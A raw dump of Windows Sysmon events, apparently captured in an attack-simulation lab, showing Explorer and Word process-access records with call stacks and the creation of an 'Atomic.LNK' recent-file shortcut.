Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292851Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292850Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292849Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292848Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000292847Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Atomic.LNK2021-04-26 20:50:08.069 23542300x8000000000000000292846Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}6568WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Atomic.LNKMD5=65F7A789CA0942DD5B1E555F271C4E68,SHA256=D503BF806CF88EBC1C1E873016A474F9372E58B2557F860F935FBCF950C66441,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292845Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292844Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292843Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292842Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292841Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292840Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292839Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292838Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292837Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292836Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292835Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000292834Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.970{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Atomic.LNK2021-04-26 20:50:08.069 10341000x8000000000000000292833Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.954{BEA10069-D4AF-6086-5601-00000000BB01}4365540C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\windows.storage.dll+3c6d1e|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292832Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.954{BEA10069-D4AF-6086-5601-00000000BB01}4365540C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft 